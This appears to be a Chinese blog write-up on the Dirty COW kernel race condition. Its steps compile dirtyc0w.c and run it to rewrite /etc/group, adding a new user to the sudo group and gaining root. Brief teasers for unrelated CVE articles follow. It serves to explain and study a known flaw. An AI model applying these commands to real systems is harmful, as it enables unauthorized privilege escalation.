簡要分析
該漏洞具體為,get_user_page核心函式在處理copy-on-write(以下使用cow表示)的過程中,可能產出競態條件造成cow過程被破壞,
導致出現寫資料到程序位址空間內唯讀記憶體區域的機會。修改su或者passwd程式就可以達到root的目的。具體分析請檢視官方分析。
測試工具
官方放出的exp:鏈結
提權為root許可權的exp一:鏈結
提權為root許可權的exp二:鏈結
漏洞利用
第一步:
sudo adduser test1新增新使用者
第二步:
gcc -pthread dirtyc0w.c -o dirty -lcrypt
利用gcc編譯dirtycow.c檔案
第三步:
切換到test1,檢視test1使用者資訊,可以看到test1使用者沒有sudo許可權,執行sudo su命令提
示不在該分組,無法執行sudo命令
第四步:
使用命令./dirty /etc/group 「$(sed 『/\(sudo*\)/ s/$/,test1/』 /etc/group)」執行exp修
改/etc/group檔案中的sudo分組成員,將test1加入到其中
第五步:
先切換為test使用者後,然後切換回來就可以看到test1使用者已經擁有了sudo許可權,執行sudo
su ,輸入test1使用者的密碼後就可以切換到root許可權,提權成功
CVE申請系列(1) CVE簡介
參考 cve申請的那些事 cve的全稱是 common vulnerabilities and exposures 翻譯成中文就是 公共漏洞和披露 它相當於乙個蒐集了很多安全漏洞的漏洞庫,不同的漏洞資訊對應著乙個不同的cve編號,所謂申請cve也就是申請乙個cve編號。cna的全稱是 cve num...
CVE引發的欺騙
研究人員在尋找瀏覽器前端安全問題時發現chrome,safari,firefox等瀏覽器中都存在安全漏洞。本文介紹蘋果產品字母d字形問題造成的網域名稱欺騙問題。u a771 研究人員發現蘋果產品中的拉丁小寫字母dum u a771 和拉丁小寫字母d u 0064 的字形非常相像。從標準的unicod...
CVE 2010 0188除錯報告
一 tiff檔案格式介紹 1 影象檔案頭 image file header 簡稱ifh ifh資料結構包含 3個成員共計 8個位元組,byte order 成員可能是 mm 0x4d4d 或 ii 0x4949 0x4d4d 表示該tiff 圖是motoral整數格式 0x4949 表示該圖是 i...